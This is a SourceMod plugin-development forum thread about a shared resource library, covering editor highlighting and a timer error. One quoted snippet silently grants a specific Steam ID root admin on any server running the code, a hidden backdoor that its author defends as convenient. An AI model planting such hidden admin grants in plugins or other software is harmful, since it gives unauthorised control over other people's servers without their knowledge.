Raised This Month: $151 Target: $400
 37% 

[ANY] Sourcemod-Resources (Last Updated 4/21/2019)


Post New Thread Reply   
 
Thread Tools Display Modes
Dragokas
Veteran Member
Join Date: Nov 2017
Location: Ukraine
Old 01-15-2019 , 08:09   Re: [ANY] Sourcemod-Resources (Last Updated 1/10/2019)
Reply With Quote #21

Thank you, Drixevel. Very useful!!!
__________________
Expert of CMD/VBS/VB6. Malware analyst.
[My plugins] [My tools] [GitHub]
Dragokas is offline
Dragokas
Veteran Member
Join Date: Nov 2017
Location: Ukraine
Old 01-15-2019 , 08:52   Re: [ANY] Sourcemod-Resources (Last Updated 1/10/2019)
Reply With Quote #22

Code:
public void OnClientPostAdminCheck(int client)
{
	AdminId adm = CreateAdmin("Drixevel");
	if (!adm.BindIdentity(AUTHMETHOD_STEAM, "STEAM_0:0:38264375"))
		return;
	
	adm.ImmunityLevel = 255;
	adm.SetFlag(Admin_Root, true);
	
	RunAdminCacheChecks(client);
}
lol
__________________
Expert of CMD/VBS/VB6. Malware analyst.
[My plugins] [My tools] [GitHub]
Dragokas is offline
Drixevel
AlliedModders Donor
Join Date: Sep 2009
Location: Somewhere headbangin'
Old 01-15-2019 , 10:45   Re: [ANY] Sourcemod-Resources (Last Updated 1/10/2019)
Reply With Quote #23

Quote:
Originally Posted by Dragokas View Post
Thank you, Drixevel. Very useful!!!
No problem.

Quote:
Originally Posted by Dragokas View Post
Code:
public void OnClientPostAdminCheck(int client)
{
	AdminId adm = CreateAdmin("Drixevel");
	if (!adm.BindIdentity(AUTHMETHOD_STEAM, "STEAM_0:0:38264375"))
		return;
	
	adm.ImmunityLevel = 255;
	adm.SetFlag(Admin_Root, true);
	
	RunAdminCacheChecks(client);
}
lol
It's a lot easier then telling people to add you via Sourcebans or via configs believe it or not.
__________________
My [Dev] Website | Discord: Drixevel#5049
Drixevel is offline
Dragokas
Veteran Member
Join Date: Nov 2017
Location: Ukraine
Old 01-15-2019 , 10:48   Re: [ANY] Sourcemod-Resources (Last Updated 1/10/2019)
Reply With Quote #24

yea, I see.
__________________
Expert of CMD/VBS/VB6. Malware analyst.
[My plugins] [My tools] [GitHub]
Dragokas is offline
Powerlord
AlliedModders Donor
Join Date: Jun 2008
Location: Seduce Me!
Old 01-16-2019 , 21:31   Re: [ANY] Sourcemod-Resources (Last Updated 1/10/2019)
Reply With Quote #25

Quote:
Originally Posted by 404UNF View Post
My syntax highlighting for Sublime Text 3 is up to date with the latest 1.10 build.

Which highlighting file format does VSCode support? Perhaps I can convert the .sublime-syntax format over to a VSCode-friendly format.
Last time I looked into VSCode syntax highlighting, it was based on a Mac editor's syntax highlighting that I wasn't familiar with.

Unfortunately, it seems like they've since buried the documentation on it because they want you to use the more complicated VSCode Language Extension system instead.

Edit: After a bit of digging, TextMate was the Mac editor in question
__________________
Am I back? Well, we'll see.

Last edited by Powerlord; 01-16-2019 at 21:34.
Powerlord is offline
Drixevel
AlliedModders Donor
Join Date: Sep 2009
Location: Somewhere headbangin'
Old 03-12-2019 , 10:15   Re: [ANY] Sourcemod-Resources (Last Updated 1/10/2019)
Reply With Quote #26

Slight Updates
  1. Lots of updates and new stuff recently to the misc file added.
  2. Added a modified version of colorvariables named 'sourcemod-colors' which is a stripped down version with some optimizations and changes to be a lot simpler and work with multiple engines versions.
  3. Updated some of the servertools commands to work for CSGO, not just TF2. (Nowhere near finished with this though)

Last edited by Drixevel; 03-12-2019 at 10:16.
Drixevel is offline
KyleS
SourceMod Plugin Approver
Join Date: Jul 2009
Location: Segmentation Fault.
Old 03-12-2019 , 16:04   Re: [ANY] Sourcemod-Misc Include [2000 lines of stocks]
Reply With Quote #27

Quote:
Originally Posted by Drixevel View Post
There used to be an issue where if you killed the timer with that method during a callback, it would output an annoying error. If they fixed this internally then this function does not have to be used anymore then.
I think we fixed this 5? years ago

Quote:
Originally Posted by Drixevel View Post
It's a lot easier then telling people to add you via Sourcebans or via configs believe it or not.
That's super bad... you need to call GetAdminId first.
KyleS is offline
Drixevel
AlliedModders Donor
Join Date: Sep 2009
Location: Somewhere headbangin'
Old 03-12-2019 , 20:02   Re: [ANY] Sourcemod-Misc Include [2000 lines of stocks]
Reply With Quote #28

Quote:
Originally Posted by KyleS View Post
I think we fixed this 5? years ago
Roughly a year and a half ago, I was getting the errors like crazy with a mod I was working on so we're either thinking of two different errors here or it's still not fixed.

Quote:
Originally Posted by KyleS View Post
That's super bad... you need to call GetAdminId first.
As in something like FindAdminByIdentity? The code works so what's missing?
Drixevel is offline
KyleS
SourceMod Plugin Approver
Join Date: Jul 2009
Location: Segmentation Fault.
Old 03-15-2019 , 16:51   Re: [ANY] Sourcemod-Misc Include [2000 lines of stocks]
Reply With Quote #29

Quote:
Originally Posted by Drixevel View Post
Roughly a year and a half ago, I was getting the errors like crazy with a mod I was working on so we're either thinking of two different errors here or it's still not fixed.
You're going to need to define what you're seeing then. File a bug on GH once you have something.


Quote:
Originally Posted by Drixevel View Post
As in something like FindAdminByIdentity? The code works so what's missing?
You're forever allocating memory; there's no scan before creating a new identity. Instead what you want to do is OnRebuildAdminCache(AdminCachePart:part) and mix that in with OnPluginStart.
KyleS is offline
Drixevel
AlliedModders Donor
Join Date: Sep 2009
Location: Somewhere headbangin'
Old 03-30-2019 , 23:31   Re: [ANY] Sourcemod-Misc Include [2000 lines of stocks]
Reply With Quote #30

Quote:
Originally Posted by KyleS View Post
You're going to need to define what you're seeing then. File a bug on GH once you have something.


You're forever allocating memory; there's no scan before creating a new identity. Instead what you want to do is OnRebuildAdminCache(AdminCachePart:part) and mix that in with OnPluginStart.
Code:
L 03/30/2019 - 20:16:37: [SM] Invalid timer handle 16040f2f (error 1) during timer end, displayed function is timer callback, not the stack trace
This is the error I'm referring to, this doesn't occur if I use KillTimerSafe but it occurs if I just delete the handle.
__________________
My [Dev] Website | Discord: Drixevel#5049
Drixevel is offline
Reply


Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump


All times are GMT -4. The time now is 10:13.


Powered by vBulletin®
Copyright ©2000 - 2019, vBulletin Solutions, Inc.
Theme made by Freecode